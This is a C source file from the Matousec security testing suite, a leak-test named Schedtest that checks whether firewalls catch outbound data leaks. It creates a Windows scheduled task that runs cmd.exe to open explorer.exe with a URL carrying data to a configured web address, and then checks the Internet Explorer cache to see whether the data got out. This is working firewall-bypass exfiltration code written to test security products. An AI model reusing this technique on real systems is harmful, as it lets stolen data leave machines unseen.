/*

 Security Software Testing Suite - Schedtest (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * Based on the idea of Wallbreaker - 4th test, written by Guillaume Kaddouch, http://www.firewallleaktester.com/.


 Method description:

   * Task Scheduler service must be running.

   * Use ITaskScheduler to run "cmd.exe" with a special parameter, which executes Windows Explorer with
     a URL as a command line parameter so that Internet Explorer is executed. This URL parameter,
     which also contains the data to transmit, redirects Internet Explorer to the Internet webpage.

   * The interface is documented in MSDN: http://msdn2.microsoft.com/en-us/library/aa381811.aspx

*/

#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#include <objbase.h>
#include <exdisp.h>
#include <shlguid.h>
#include <lmcons.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"
#include "include/taskscheduler.hpp"


int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  COM_CONF conf;
  if (!com_console_init_winmain("Schedtest","schedtest",lpCmdLine,&conf,COM_TEST_TYPE_SCHEDTEST)) return 1;

  char *used_dlls[]={"user32.dll","ole32.dll","oleaut32.dll"};
  if (!com_hook_load_libraries(used_dlls,3)) return 1;

  com_uri_replace_eq(&conf);
  DeleteUrlCacheEntry(conf.uri);


  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  HRESULT hres=CoInitialize(NULL);
  if (SUCCEEDED(hres))
  {
    ITaskScheduler *scheduler;
    hres=CoCreateInstance(CLSID_CTaskScheduler,NULL,CLSCTX_INPROC_SERVER,IID_ITaskScheduler,(void**)&scheduler);
    if (SUCCEEDED(hres))
    {
      if (com_verbosity_get()) printf("ITaskScheduler instance created.\n");

      ITask *task;
      hres=scheduler->NewWorkItem(L"Schedtest",CLSID_CTask,IID_ITask,(IUnknown**)&task);
      if (SUCCEEDED(hres))
      {
        if (com_verbosity_get()) printf("ITask instance created.\n");

        hres=task->SetApplicationName(L"cmd.exe");
        if (SUCCEEDED(hres))
        {
          if (com_verbosity_get()) printf("ITask application name set to \"cmd.exe\".\n");

          wchar_t argw[MAX_PATH+COM_INET_URI_MAX_LEN];
          snwprintf(argw,sizeof(argw)/sizeof(wchar_t),L"/C explorer.exe %S",conf.uri);
          argw[sizeof(argw)/sizeof(wchar_t)-1]=L'\0';

          hres=task->SetParameters(argw);
          if (SUCCEEDED(hres))
          {
            if (com_verbosity_get()) printf("ITask parameters set to \"%S\".\n",argw);

            hres=task->SetFlags(TASK_FLAG_INTERACTIVE | TASK_FLAG_DELETE_WHEN_DONE | TASK_FLAG_RUN_ONLY_IF_LOGGED_ON);
            if (SUCCEEDED(hres))
            {
              if (com_verbosity_get()) printf("ITask flags set to TASK_FLAG_INTERACTIVE | TASK_FLAG_DELETE_WHEN_DONE | TASK_FLAG_RUN_ONLY_IF_LOGGED_ON.\n");

              wchar_t curuserw[UNLEN+1];
              DWORD user_len=sizeof(curuserw)/sizeof(wchar_t);
              if (GetUserNameW(curuserw,&user_len))
              {
                hres=task->SetAccountInformation(curuserw,NULL);
                if (SUCCEEDED(hres))
                {
                  IPersistFile *persist_file;
                  hres=task->QueryInterface(IID_IPersistFile,(void **)&persist_file);
                  if (SUCCEEDED(hres))
                  {
                    hres=persist_file->Save(NULL,TRUE);
                    if (SUCCEEDED(hres))
                    {
                      if (com_verbosity_get()) printf("ITask saved.\n");
                      res=TRUE;
                    } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to save ITask.\n");

                    persist_file->Release();
                  } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to query IPersistFile.\n");

                } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to set ITask account information.\n");
              } else com_err_set(&err_inf,"Unable to get the name of currently logged on user.\n");
            } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to set ITask flags to TASK_FLAG_INTERACTIVE | TASK_FLAG_DELETE_WHEN_DONE | TASK_FLAG_RUN_ONLY_IF_LOGGED_ON.\n");
          } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to set ITask parameters to \"%S\".\n",argw);
        } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to set ITask application name to \"cmd.exe\".\n");

        task->Release();
      } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to create new scheduler task.\n");

      if (res)
      {
        res=FALSE;

        ITask *task;
        hres=scheduler->Activate(L"Schedtest",IID_ITask,(IUnknown**)&task);
        if (SUCCEEDED(hres))
        {
          hres=task->Run();
          if (SUCCEEDED(hres))
          {
            if (com_verbosity_get()) printf("ITask started.\n");

            char buffer[4096];
            res=com_attempt_check_ie_cache(buffer,sizeof(buffer),&conf,20000,&err_inf)
             && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);
          } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to start ITask.\n");

          task->Release();
        } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to activate task.\n");

        scheduler->Delete(L"Schedtest");
      }
      scheduler->Release();
    } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to create instance of ITaskScheduler.\n");

    CoUninitialize();
  } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to initialize COM.\n");


  return com_end(res,&err_inf,&conf);
}
